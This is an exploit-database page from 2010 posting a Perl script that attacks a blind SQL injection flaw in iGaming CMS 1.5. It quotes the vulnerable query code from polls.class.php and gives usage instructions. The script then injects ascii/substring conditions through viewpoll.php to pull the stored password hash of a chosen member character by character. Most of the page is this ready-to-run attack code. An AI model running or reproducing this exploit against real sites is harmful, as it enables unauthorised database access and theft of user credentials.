[webapps / 0day] - iGaming CMS <= 1.5 Blind SQL Injection
Posted on 01 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>iGaming CMS <= 1.5 Blind SQL Injection Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='iGaming CMS <= 1.5 Blind SQL Injection Exploit by plucky in webapps / 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>============================================== iGaming CMS <= 1.5 Blind SQL Injection Exploit ============================================== #!/usr/bin/env perl =pod iGaming CMS <= 1.5 Blind SQL Injection Author: plucky Email: io.plucky@gmail.com Web Site: http://plucky.heliohost.org Crew : WarWolfZ Usage: perl exploit.pl <website> <user_id> Example: perl exploit.pl http://website.net/iGamingCMS1.5/ 1 Vulnerability: polls.class.php [line 10-17] if (!empty($_REQUEST['id'])) { $poll = $db->Execute(" SELECT id,title FROM `sp_polls` WHERE `id` = '" . $_REQUEST['id'] . "'"); $result = $db->Execute("SELECT * FROM sp_polls_options WHERE poll_id = '$_REQUEST[id]' ORDER BY id"); THX TO: shrod and warwolfz crew =cut use strict; use warnings; use LWP::Simple; my $password = ''; my $vulnerable_page = ''; my $target_id = 1; sub header_exploit { print 'iGaming CMS <= 1.5 Blind SQL Injection' . " ". '-----------------------------------------' . " ". 'Author: plucky' . " ". 'Email: io.plucky@gmail.com' . " ". '-----------------------------------------' . " ". '[!]Target id: '.$target_id . " ". '[!]Exploit Status: Working...' . " "; } sub usage_exploit { print 'Usage:' . " ". ' perl exploit.pl http://[site]/[path]/ [id]' . " ". 'Examples:' . " ". ' perl' . $0 . 'http://web_site/cms/ 1' . " ". ' perl' . $0 . 'http://games_site/iGamingCMS1.5/ 1' . " "; exit; } sub run_exploit { my $parameter_id = shift; my $parameter_page = shift; my $target_id = $$parameter_id; my $vulnerable_page = $$parameter_page; my $character_id = 1; my $HTML_source = ''; my $SQL_Injection = ''; my $hexadecimal_character = ''; my $result = ''; my $table = 'sp_members'; my @hexadecimal_characters = ( 48..57, 97..102 ); foreach $character_id ( 1..32 ) { character_research: foreach $hexadecimal_character ( @hexadecimal_characters ) { $SQL_Injection = "viewpoll.php?id=' or ascii(substring((select pass from $table where id=$target_id),$character_id,1))=$hexadecimal_character\%23"; $HTML_source = get( $vulnerable_page.$SQL_Injection ); if ( $HTML_source !~ /Error/i ) { $result .= chr($hexadecimal_character); $character_id++; last character_research; } } } return $result; } $vulnerable_page = $ARGV[0] || usage_exploit; $target_id = $ARGV[1] || usage_exploit; header_exploit; $password = run_exploit ( $target_id, $vulnerable_page ); print '[!]Password: ', $password, " "; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-01]</pre></body></html>
